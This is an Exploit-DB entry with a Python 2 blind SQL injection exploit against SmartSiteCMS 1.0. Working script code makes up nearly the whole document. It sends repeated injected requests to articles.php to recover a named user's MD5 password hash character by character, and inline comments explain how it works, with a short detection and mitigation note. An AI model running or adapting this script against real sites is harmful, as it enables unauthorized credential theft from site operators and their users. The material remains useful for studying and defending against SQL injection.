SmartSiteCMS 1.0 - Blind SQL Injection

EDB-ID:

7901




Platform:

PHP

Date:

2009-01-28


#!/usr/bin/python

import sys
import re
from socket import *

class exploit:
	"""Boolean-based blind SQL injection probe for SmartSiteCMS 1.0 (Python 2 code).

	An instance holds the target host, the CMS path prefix and the user name
	whose ``users.password`` value is read one character at a time through
	the ``var`` parameter of ``articles.php``.  ``set_query`` builds the raw
	HTTP request for one (position, character) guess; ``check`` sends it and
	reports whether the page body differs from the expected layout, which the
	driver loop at the bottom of the file treats as "guess was correct".

	Detection note: every guess is a separate GET to ``articles.php`` whose
	``var`` value carries ``%27%20OR%20ASCII(SUBSTRING(`` -- a long run of
	near-identical requests from one client differing only in two numbers.
	The CMS-side mitigation is a parameterized query for ``var``.
	"""
	def __init__(self,host,path,user):
		self.host=host
		self.path=path
		self.user=user
		# Anchor marker in the rendered page; check() inspects what follows it.
		self.reg=re.compile("<!-- END COMMENT FORM -->")
	def set_query(self,n,ch):
		# Injected condition: true only when character n (1-based) of the
		# password of self.user has ASCII code ord(ch).  The leading quote
		# closes the application's string literal; "OR '1'='2" re-balances it.
		self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
		# Hand-rolled URL encoding: only space and single quote are escaped;
		# any other reserved character in self.user goes out unencoded.
		self.query = self.query.replace(" ","%20")
		self.query = self.query.replace("'","%27")
		# Raw HTTP/1.0 request with a Host header; written as a str, which
		# socket.send() accepts on Python 2 only.
		self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
	def check(self):
		# Plain TCP to port 80 (hard-coded): no TLS, no port option.
		sock=socket(AF_INET, SOCK_STREAM)
		sock.connect((self.host, 80))
		sock.send(self.request)
		r=""
		t="-"
		# Read the whole response until the server closes the connection
		# (recv returns "").  Headers and body are kept together in r.
		while(t!=""):
			t=sock.recv(1024)
			r+=t
		# If the marker is absent, match is None and the slice below raises
		# AttributeError instead of returning a verdict.
		match=self.reg.search(r)
		# The 32 bytes starting 27 past the marker are compared with the
		# related-articles comment; any difference is reported as 1.
		if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"):
			return 1
		else:
			return 0
		# Unreachable: both branches above return first, so the socket is
		# never closed explicitly and relies on garbage collection.
		sock.close()

# Banner (Python 2 print statements; this file does not run under Python 3).
print "////*****************************************\\\\\\\\"
print "||||           smartSiteCMS 1.0 v1.0         ||||"
print "||||            Blind SQL injection          ||||"
print "||||					     ||||"
print "|||| ~Author: certaindeath                   ||||"
print "|||| ~Greetz: darkjoker                      ||||"
print "\\\\\\\\*****************************************////\n"

# Exactly three positional arguments: host, CMS path prefix, user name.
if(len(sys.argv) !=4 ):
	print "Usage:	python xpl.py <host> <cms path> <user>"
	print "Example: python xpl.py localhost /cms admin"
	sys.exit(0)

pwd=""
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
n=1
# One outer iteration per character position, 32 in total -- the length of
# an MD5 hex digest, matching the "[md5]" label printed at the end.
while(n<=32):
	t=0
	# First guess for this position is "0"; the inner loop steps t upward
	# until check() reports a differing page, one HTTP request per guess.
	xpl.set_query(n,str(t))
	while (xpl.check()!=1):
		t+=1
		# str(hex(t))[-1] is the last hex digit of t, so t = 0..15 covers
		# '0'-'f'.  Past 15 the digit wraps around, so if no digit ever
		# matches (or check() raises) this loop does not terminate.
		xpl.set_query(n,str(hex(t))[-1])
	pwd+=str(hex(t))[-1]
	n+=1
print "pass [md5]: ",pwd

# milw0rm.com [2009-01-28]